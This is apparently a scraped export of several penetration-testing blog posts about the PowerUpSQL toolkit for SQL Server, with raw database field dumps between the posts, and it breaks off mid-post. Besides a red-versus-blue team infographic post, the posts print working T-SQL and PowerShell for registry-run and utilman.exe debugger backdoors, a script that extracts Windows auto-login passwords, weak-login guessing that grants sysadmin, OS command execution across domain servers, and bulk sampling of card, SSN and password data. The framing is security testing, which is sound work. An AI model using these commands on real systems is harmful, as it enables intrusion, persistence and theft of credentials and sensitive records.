In this blog, I outlined common techniques that can be used to escalate privileges from a local Windows administrator to a SQL Server sysadmin (DBA).  I’ve also shared a few new PowerUpSQL functions that wrap the Invoke-TokenManipulation function to help make the job easier.  Hopefully they’ll be helpful. Have fun and hack responsibly! [post_title] => How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL [post_excerpt] => In this blog I outline common techniques that can be used to leverage the SQL Server service account to escalate privileges from a local administrator to a SQL Server sysadmin (DBA). [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => get-sql-server-sysadmin-privileges-local-admin-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:52 [post_modified_gmt] => 2021-06-08 21:51:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7582 [menu_order] => 503 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [35] => WP_Post Object ( [ID] => 6761 [post_author] => 17 [post_date] => 2016-10-11 07:00:08 [post_date_gmt] => 2016-10-11 07:00:08 [post_content] =>

Despite the large investment many companies have made in detective controls, it’s still pretty common for us to take over an entire network during a penetration test or red team engagement, and never trigger a single response ticket. Naturally this has generated some concern at the CSO level as to whether or not a real breach would be detected.

Testing the effectiveness of detective and preventative controls can be a challenge. However, the process can be a lot easier if common attack workflows are understood, and broken into manageable pieces. In this blog, I’ll share an eyechart an infographic that illustrates some common red team attack workflows and blue team controls to help get you started.

Disclaimer: Unfortunately, it’s a pain to get lots of information into one diagram. So it only represents common phishing attacks workflows and should not be considered complete or comprehensive. The tools, techniques, and procedures used by attackers are constantly evolving and changing so there is just not enough room on the page to fit it all in.

Hopefully the information will be interesting to security teams in the process of building out and testing their preventative and detective capabilities.

Infographic Download

You can download the infographic here. And learn more about NetSPI's red team security services here.

Also, below are some general tips for red and blue teams who are just getting their feet wet. They’ve helped me out a lot in the past.

General Red Team Tips

Below are a few general tips for avoiding detection during red team engagements.

  1. Do not perform large scanning operations.
  2. Do not perform online dictionary attacks.
  3. Do perform recon locally and on the network.
  4. Do perform targeted attacks based on recon data.
  5. Do not use common attack tools. Especially on disk.
  6. Do try to stay off disk when possible.
  7. Do try to operate as a normal user or application.
  8. Do try to use native technologies to access the environment remotely without a C2. If C2 is required the use of beaconing, tunneling, and side channels typically goes undetected.
  9. Do not change major configuration states.
  10. Do not create accounts.

General Blue Team Detective Control Tips

Below are a few general tips for detecting unskilled attackers.

  1. Define clear detective control boundaries.
    It may be cliché, but detection in depth is as important as defense in depth these days. Make sure to have a good understanding of all the layers your environments and define clear detective control boundaries. This should include, but is not limited to networks, endpoints, applications, and databases. Also, don’t neglect your internal processes and intelligence feeds. They can be handy when trying to evaluate context and risk.
  2. Map out your data and logging sources for each layer of the environment.
    You may have information that can be used to detect IoAs and IoCs that you were unaware of. Having a solid understanding of what information is available will allow you to be a more adaptive blue team.
  3. Find solutions based on value not price.
    There are lots of preventative and detective control products out there. Most of the mature options are commercial, but the open source options are getting better. Also, don’t be afraid to get a little dirty and write some of your own tools. Naturally this can include things like HIDS, HIPS, NIDS, NIPS, SIEM, DLP, honeypots, tarpits, and canaries. I’m personally a big fan of canaries – they are cheap and can be really effective.
  4. Be creative.
    For example, many endpoint protection suites can detect common scanning activity on the LAN in the absence of internal net flow data.
  5. Audit for high impact security events. Make sure you have coverage for the most common IoC and IoAs at each layer of your environment. This one seems obvious, but a lot of companies miss common high impact events.
  6. Work with your red team to test controls.
    In my experience, you get the most value out of red team engagements when the red and blue teams work together to understand attacks in depth. That collaboration generally leads to better preventative and detective controls.While performing offensive actions against implemented controls consider asking the following basic questions to help ensure ongoing improvement:
    1. Were any security events logged for the attack? (Where, Why/Why not?)
    2. Did the security events trigger alerts? (Where, Why/Why not?)
    3. Did the security events trigger an incident response ticket? (Where, Why/Why not?)

Conclusion

Go purple team! Naturally, every red team engagement has different goals and collaborating with the blue team isn’t always going to align with them. However, if one of your goals is to test the effectiveness the technical detective controls in place, then working together will yield much better results than doing everything in a silo. Hopefully this was helpful. Have fun and hack responsibly!

[post_title] => Common Red Team Techniques vs Blue Team Controls Infographic [post_excerpt] => In this blog, I’ll share an infographic that illustrates some common red team attack workflows and blue team controls. I'll also include some basic red & blue team tips. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => common-red-team-techniques-vs-blue-team-controls-infographic [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:42 [post_modified_gmt] => 2021-06-08 21:47:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6761 [menu_order] => 522 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [36] => WP_Post Object ( [ID] => 6728 [post_author] => 17 [post_date] => 2016-08-05 07:00:30 [post_date_gmt] => 2016-08-05 07:00:30 [post_content] => In this blog I’ll show how to use PowerUpSQL to establish persistence (backdoor) via the Windows registry through SQL Server. I’ll also provide a brief overview of the xp_regwrite stored procedure. This should be interesting to pentesters and red teamers interested in some alternative ways to access the OS through SQL Server.

An overview of xp_regwrite

xp_regwrite is an undocumented native extended stored procedure in SQL Server. Since it’s been around since SQL Server 2000 I use the term “undocumented” loosely. It allows logins to create and edit Windows registry keys without having to enable and use xp_cmdshell. The downside (from the attacker’s perspective) is that it can only be executed by a sysadmin. While that restriction usually rules it out as a privilege escalation vector, it is incredibly handy during post exploitation. The registry is integrated into most aspects of the Windows operation. So you’re only limited by your imagination and the SQL Server service account. Similar to other extended stored procedures, xp_regwrite executes with the SQL Server service account’s privileges. So if it can write to the registry as LocalSystem, then so can you. While the sky is the limit, at the end of the day I’m still a pentester at heart. So I thought it would be useful to show how to use xp_regwrite to establish persistence. There are hundreds of registry keys (if not more) that can lead to command execution, but the two examples below seem to be some of the most common.

PowerUpSQL primer

Before we get started, if you would like an overview of PowerUpSQL check out the blog here. Also, if just want to learn how to use PowerUpSQL to discover SQL Servers check out this blog.

Using CurrentVersionRun to establish persistence with xp_regwrite

The example below shows how to use xp_regwrite to add a command to the HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun registry key. The command will be run automatically anytime a user logs into Windows.
---------------------------------------------
-- Use SQL Server xp_regwrite to configure 
-- a file to run via UNC Path when users login
----------------------------------------------
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SoftwareMicrosoftWindowsCurrentVersionRun',
@value_name  = 'EvilSauce',
@type        = 'REG_SZ',
@value       =  'EvilBoxEvilSandwich.exe '
I wrote that functionality into the PowerUpSQL “Get-SQLPersistRegRun” function to make the task a little easier. The example below shows how to run a simple PowerShell command, but in the real world it would do something evil. This type of persistence is also supported by The Metasploit Framework and PowerShell Empire.
PS C:> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C "Write-Output hacker | Out-File C:tempiamahacker.txt"' -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write value: PureEvil
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Output hacker | Out-File C:tempiamahacker.txt"
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.
The example below shows how to run a simple a command from an attacker controlled share via a UNC path similar to the TSQL example.
.Example
PS C:> Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "EvilBoxEvilSandwich.exe" -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write value: EvilSauce
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: "EvilBoxEvilSandwich.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.

Setting a debugger for accessibility options using xp_regwrite

This is a cool persistence method, because no user interaction is required to execute commands on the system. Which I prefer of course. :) The example below shows how to configure a debugger for utilman.exe, which will run cmd.exe when it’s called. That includes when you’re at the log in screen. After it’s been executed, it’s possible to RDP to the system and launch cmd.exe with the windows key+u key combination.
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsutilman.exe',
@value_name  = 'Debugger',
@type        = 'REG_SZ',
@value       = '"c:windowssystem32cmd.exe"'
Note:If network level authentication is enabled you won’t have enough access to see the logon screen and you may have to consider other options for command execution. Of course, that's just another registry setting. ;) I’ve written a PowerUpSQL function for this too, called “Get-SQLPersistRegDebugger”. Below is the utilman.exe example.
PS C:> Get-SQLPersistRegDebugger-Verbose -FileName utilman.exe -Command 'c:windowssystem32cmd.exe' -Instance "SQLServer1STANDARDDEV2014"
VERBOSE: SQLServer1STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write debugger for: utilman.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Attempting to write command: c:windowssystem32cmd.exe
VERBOSE: SQLServer1STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1STANDARDDEV2014 : Done.

Wrap Up

Even though the xp_regwrite extended stored procedure is only executable by sysadmins, it’s still incredibly handy during post exploitation. To illustrate that point I created two PowerUpSQL functions to establish persistence in Windows through SQL Server using xp_regwrite. Hopefully this has been useful and will get you thinking about other things xp_regwrite can do for you. Good luck and hack responsibly!

References

[post_title] => Establishing Registry Persistence via SQL Server with PowerUpSQL [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => establishing-registry-persistence-via-sql-server-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:39 [post_modified_gmt] => 2021-06-08 21:47:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6728 [menu_order] => 524 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [37] => WP_Post Object ( [ID] => 6707 [post_author] => 17 [post_date] => 2016-08-04 07:00:04 [post_date_gmt] => 2016-08-04 07:00:04 [post_content] => In this blog I’ll show how to use PowerUpSQL to dump Windows auto login passwords through SQL Server. I’ll also talk about other ways the xp_regread stored procedure can be used during pentests.

A brief history of xp_regread

The xp_regread extended stored procedure has been around since SQL Server 2000. The original version allowed members of the Public server role to access pretty much anything the SQL Server service account had privileges to. At the time, it had a pretty big impact, because it was common for SQL Servers to run as LocalSystem. Since SQL Server 2000 SP4 was released, the impact of the xp_regread has been pretty minimal due to a few access controls that were added that help prevent low privileged logins from accessing sensitive registry locations. Now days, the only registry locations accessible to unprivileged users are related to SQL Server. For a list of those locations you can visit https://support.microsoft.com/en-us/kb/887165 Below are a few of the more interesting accessible paths: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer HKEY_CURRENT_USER\Software\Microsoft\Mail HKEY_CURRENT_USER\Control Panel\International

Practical uses for xp_regread with the Public Role

Even with our hands tied, xp_regread can be used to grab a lot of useful information. In fact, when logged in as least privilege login, I often use it to grab server information that I couldn’t get anywhere else. For example, the Get-SQLServerInfo function in PowerUpSQL includes some of those queries.
PS C:\> Get-SQLServerInfo
ComputerName           : SQLServer1
Instance               : SQLServer1
DomainName             : demo.local
ServiceName            : MSSQLSERVER
ServiceAccount         : NT Service\MSSQLSERVER
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : demo\user
IsSysadmin             : Yes
ActiveSessions         : 3
The access control restrictions implemented in SQL Server SP4 do not apply to sysadmins. As a result, anything the SQL Server service account can access in the registry, a sysadmin can access via xp_regread. At first glance this may not seem like a big deal, but it does allow us to pull sensitive data from the registry without having to enable xp_cmdshell, which can trigger a lot of alarms when it’s enabled and used. So xp_regread actually ends up being handy for basic SQL Server post exploitation tasks.

Recovering Windows Auto Login Credentials with xp_regread

It’s possible to configure Windows to automatically login when the computer is started. While this is not a common configuration in corporate environments, it’s something we see frequently in retail environments. Especially those that support legacy POS terminals and kiosks with SQL Servers running locally. In most cases, when Windows is configured to login automatically, unencrypted credentials are stored in the registry key: HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Using that information we can write a basic TSQL script that uses xp_regread to pull the auto login credentials out of the registry for us without having to enable xp_cmdshell. Below is an example TSQL script, but since the registry paths aren't on the allowed list we have to run the query as a sysadmin:
-------------------------------------------------------------------------
-- Get Windows Auto Login Credentials from the Registry
-------------------------------------------------------------------------

-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultDomainName',
@value            = @AutoLoginDomain output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginUser  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultUserName',
@value            = @AutoLoginUser output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginPassword  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultPassword',
@value            = @AutoLoginPassword output 

-- Display Results
SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword
I’ve also created a PowerUpSQL function called “Get-SQLRecoverPwAutoLogon” so you could run it on scale. It will recover the default Windows auto login information and the alternative Windows auto login information if it has been set. Then it returns the associated domain name, user name, and password. Below is a command example for those who are interested. If you're interest in learning about blindy targeting SQL Server you can peek at this blog.
PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”}
PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose
VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done.
VERBOSE: SQLServer3.demo.local\2014 : Connection Success.
VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done.

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : KioskAdmin
Password     : test

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : kioskuser
Password     : KioskUserPassword!

Wrap Up

Even though the xp_regread extended stored procedure has been partially neutered, there are still a number of ways that it can prove useful during penetration tests and red team engagements. Hopefully you’ll have some fun with the “Get-SQLServerInfo”, “Get-SQLRecoverPwAutoLogon” functions that build off of its capabilities. More registry fun to come. In the meantime, good luck and hack responsibly!

References

[post_title] => Get Windows Auto Login Passwords via SQL Server with PowerUpSQL [post_excerpt] => In this blog I’ll show how to use PowerUpSQL to dump Windows auto login passwords through SQL Server via xp_regread. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => get-windows-auto-login-passwords-via-sql-server-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:19 [post_modified_gmt] => 2021-04-13 00:05:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6707 [menu_order] => 523 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [38] => WP_Post Object ( [ID] => 6534 [post_author] => 17 [post_date] => 2016-08-02 07:00:47 [post_date_gmt] => 2016-08-02 07:00:47 [post_content] => In this blog, I’ll show how to use PowerUpSQL to quickly identify SQL logins configured with weak passwords on domain SQL Servers, using a standard domain account. We’ve used the techniques described below to obtain access to sensitive data and elevate privileges on SQL Servers. In many cases, the identified weak passwords also lead to domain privilege escalation via sysadmin access. Hopefully this blog will be interesting to pentesters, red teamers, and administrators looking for another tool for auditing their SQL Servers for weak configurations.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog, so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.
  1. Download PowerUpSQL. https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
  3. Get a list of accessible SQL Servers on the domain.
    PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
  4. View accessible servers
    PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
    PS C:\> $Accessible
    
    ComputerName   Instance                       Status    
    ------------   --------                       ------    
    SQLServer1     SQLServer1\SQLEXPRESS          Accessible
    SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
    SQLServer1     SQLServer1                     Accessible

Enumerating SQL Logins as a Domain User

By default, non-sysadmin logins in SQL Server don’t have privileges to select a list of SQL logins from the standard tables. However, functions exist in SQL Server that allow least privilege logins to do it anyways using basic fuzzing techniques. That means any user that can log into SQL Server can get a full user list. For the details check out this blog. The PowerUpSQL “Invoke-SQLAuditWeakLoginPw” function can be used to automatically fuzz login names and attempt to identify weak passwords. By default, the function will only test the login as the password, and “password” as the password. So only two passwords will be attempted for each enumerated login. However, custom user and password lists can be provided. At first glance this doesn’t seem like a big deal. However, in large environments this simple attack has been yielding hundreds of weak passwords on accessible SQL Servers using normal domain user accounts.

Identifying Weak SQL Server Passwords on Scale using PowerUpSQL

Below are a few examples showing how to use the “Invoke-SQLAuditWeakLoginPw” function with the accessible SQL Server list we obtained in the last section. Note: All of the examples shown are run as the current Windows user, but alternative SQL Server login credentials can be provided.
PS C:\>; $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose

ComputerName  : SQLServer1
Instance      : SQLServer1\EXPRESS
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
 Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testuser (Not Sysadmin) is configured with the password testuser.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQLServer1
Instance      : SQLServer1\Express
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testadmin (Sysadmin) is configured with the password testadmin.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016
The function also supports automatically adding your current login to the sysadmin fixed server role if a sysadmin password is guessed by the script. Below is an example.
PS C:\> Invoke-SQLAuditWeakLoginPw –Verbose –Instance server\instance –Exploit

..[snip]..

ComputerName  : SQLServer1
Instance      : SQLServer1\Express
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : Yes
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testadmin (Sysadmin) is configured with the password testadmin.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

..[snip]..

Or you could attempt to add yourself as a sysadmin on all accessible servers...
PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose –Exploit

Executing OS Commands on SQL Servers with PowerUpSQL

If you were able to escalate privileges using the commands from the previous section then you’re ready to execute OS commands on the SQL Server. The local and domain privileges you’ll have will vary depending on the SQL Server service account being used. It’s very common to see a single domain account being used to run a large portion of the SQL Servers in the environment. However, it’s also very common for SQL Servers to be configured to run as LocalSystem or a managed service account. Below is the PowerUpSQL example showing how to execute OS commands on affected SQL Servers:
PS C:\> Invoke-SQLOSCmd –Verbose –Instance SQLServer1\Express –Command “dir c:\windows\system32\Drivers\etc” –RawResults

VERBOSE: Creating runspace pool and session states
VERBOSE: SQLSERVER1\EXPRESS: Connection Success.
VERBOSE: SQLSERVER1\EXPRESS: You are a sysadmin.
VERBOSE: SQLSERVER1\EXPRESS: Show Advanced Options is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: xp_cmdshell is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: Running command: dir c:\windows\system32\Drivers\etc
 Volume in drive C is OSDisk
 Volume Serial Number is C044-F8BC
 Directory of c:\windows\system32\Drivers\etc
07/16/2016  08:42 PM    <DIR>          .
07/16/2016  08:42 PM    <DIR>          ..
09/22/2015  10:16 AM               851 hosts
08/22/2013  10:35 AM             3,683 lmhosts.sam
08/22/2013  08:25 AM               407 networks
08/22/2013  08:25 AM             1,358 protocol
08/22/2013  08:25 AM            17,463 services
               5 File(s)         23,762 bytes
               2 Dir(s)  142,140,887,040 bytes free
VERBOSE: Closing the runspace pool
Or if you would like to run commands on multiple servers you can use the example below.
PS C:\>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10

ComputerName   Instance                       CommandResults              
------------   --------                       --------------                   
SQLServer1     SQLServer1\SQLEXPRESS          nt service\mssql$sqlexpress 
SQLServer1     SQLServer1\STANDARDDEV2014     nt authority\system         
SQLServer1     SQLServer1                     Domain\SQLSvc

Wrap Up

In this blog, I provided an overview of how to use the PowerUpSQL function "Invoke-SQLAuditWeakLoginPw" to quickly identify SQL Server logins configured with weak passwords on ADS domains. While the function doesn't offer any new techniques, it does provide more automation than the scripts I've provided in the past. As a result, it has potential to provide unauthorized data access and additional domain privileges in most large environments. It's also worth noting that the "Invoke-SQLEscalatePriv" function attempts to exploit this issue along with others when it's run. Good luck and hack responsibility! [post_title] => Finding Weak Passwords for Domain SQL Servers on Scale using PowerUpSQL [post_excerpt] => We'll cover how to use PowerUpSQL to quickly identify SQL logins configured with weak passwords on domain SQL Servers using a standard domain account. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => identifying-domain-sql-servers-configured-with-weak-passwords-on-scale-using-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:47 [post_modified_gmt] => 2021-04-13 00:05:47 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6534 [menu_order] => 526 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [39] => WP_Post Object ( [ID] => 6565 [post_author] => 17 [post_date] => 2016-08-02 07:00:25 [post_date_gmt] => 2016-08-02 07:00:25 [post_content] => In this blog I’ll show how PowerUpSQL can be used to rapidly target and sample sensitive data stored in SQL Server databases associated with Active Directory domains. We’ve used the techniques below to discover millions of PCI, HIPAA, and other sensitive records living inside and outside of protected network zones. Hopefully PowerUpSQL can help you do the same.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.
  1. Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
  3. Get a list of accessible SQL Servers on the domain.
    PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
  4. View accessible servers
    PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
    PS C:\> $Accessible
    
    ComputerName   Instance                       Status    
    ------------   --------                       ------    
    SQLServer1     SQLServer1\SQLEXPRESS          Accessible
    SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
    SQLServer1     SQLServer1                     Accessible
Pro tip: Once you've obtained Domain Admin privileges, add yourself to the DBA groups and run through the process again. More access = more data. :)

Finding Sensitive Data on Domain SQL Servers

If you followed the instructions in the last section you should have a variable named "$Accessible" that contains a list of all accessible SQL Server instances. The command below uses that variable to perform a broad search across all accessible SQL Servers for database table column names that contain provided keywords. I've created an example showing one server, but in real environments there are often hundreds.
PS C:\> $Accessible | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults | ft -AutoSize

...[SNIP]...

VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN
VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS
VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria...
VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card]
VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 2 rows of data sample from column [testdb].[dbo].[tracking].[card].
VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN

...[SNIP]...

ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC
------------   --------                   -------- ------ -----    ------ ------           -------- ----
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False

...[SNIP]...
Below is a breakdown of what the command does:
  • It runs 10 concurrent host threads at a time
  • It searches accessible domain SQL Servers for database table columns containing the keywords “card” or “password”
  • It grabs a two sample records from each matching column
  • It checks if the sample data contains a credit card number using the Luhn formula
  • It filters out all default databases
If you want to target a single server you can also use the command below.
Get-SQLColumnSampleData –Verbose –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults  –Instance “Server1\Instance1”

Targeting Potentially Sensitive Databases

To save time in larger environments you may want to be a little more picky about what servers you're targeting during data searches. Especially if you’re searching for multiple keywords. Dumping a list of databases and their properties can give you the information you need to make better server targeting decisions. Some key pieces of information include:
  • Database Name This is the most intuitive. Databases are often named after the associated application or the type of data they contain.
  • is_encrypted Flag This tells us if transparent encryption is used. People tend to encrypt things they want to protect so these databases make good targets. ;) Transparent encryption is intended to protect data at rest, but if we login as a sysadmin, SQL Server will do the work of decrypting it for us. A big thanks goes out to James Houston for sharing that trend with us.
  • Database File Size The database file size can help you determine if the database is actually being used. The bigger the database, the more data to sample. :)
To dump a list of all accessible SQL Server databases you can use the command below. Once again, we'll use the "$Accessible" variable we created earlier. Storing the accessible servers in a variable allows us to quickly execute different PowerUpSQL functions against those servers without having to run the discovery commands again. Note: The example only shows a sample of the output for one record, but in most environments you would have a lot more.
PS C:\> $Databases = $Accessible | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults
PS C:\> $Databases

...[SNIP]...

ComputerName        : SQLServer1
Instance            : SQLServer1\STANDARDDEV2014
DatabaseId          : 7
DatabaseName        : testdb
DatabaseOwner       : sa
OwnerIsSysadmin     : 1
is_trustworthy_on   : True
is_db_chaining_on   : False
is_broker_enabled   : True
is_encrypted        : True
is_read_only        : False
create_date         : 4/13/2016 4:27:36 PM
recovery_model_desc : FULL
FileName            : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf
DbSizeMb            : 3.19
has_dbaccess        : 1

...[SNIP]...
Once the results are stored in the "$Databases" variable there a ton of ways to view the data. Below are some of the more common options. In the examples, the results are sorted by the database name alphabetically.
# Output results to display
$Databases | Sort-Object DatabaseName

# Output results to display in table format
$Databases | Sort-Object DatabaseName | Format-Table -AutoSize

# Output results to pop grid with search functionality
$Databases | Sort-Object DatabaseName | Out-GridView

# Output results to a csv file
$Databases | Sort-Object DatabaseName | Export-Csv -NoTypeInformation  C:\temp\databases.csv
If you're only interested in encrypted databases you can use the command below.
$Databases | Where-Object {$_.is_encrypted –eq “TRUE”}
The "$Databases" output can also be piped directly into the Get-SQLColumnSampleDataThreaded command as shown below.
$Databases | Where-Object {$_.is_encrypted –eq “TRUE”} |Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults
Of course, some people are not fans of multi step commands...

Bringing it All Together

If you prefer to fully automate your data sampling experience everything can be executed as a single command. Below is an example:
Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults |
Export-CSV –NoTypeInformation c:\temp\datasample.csv

Wrap Up

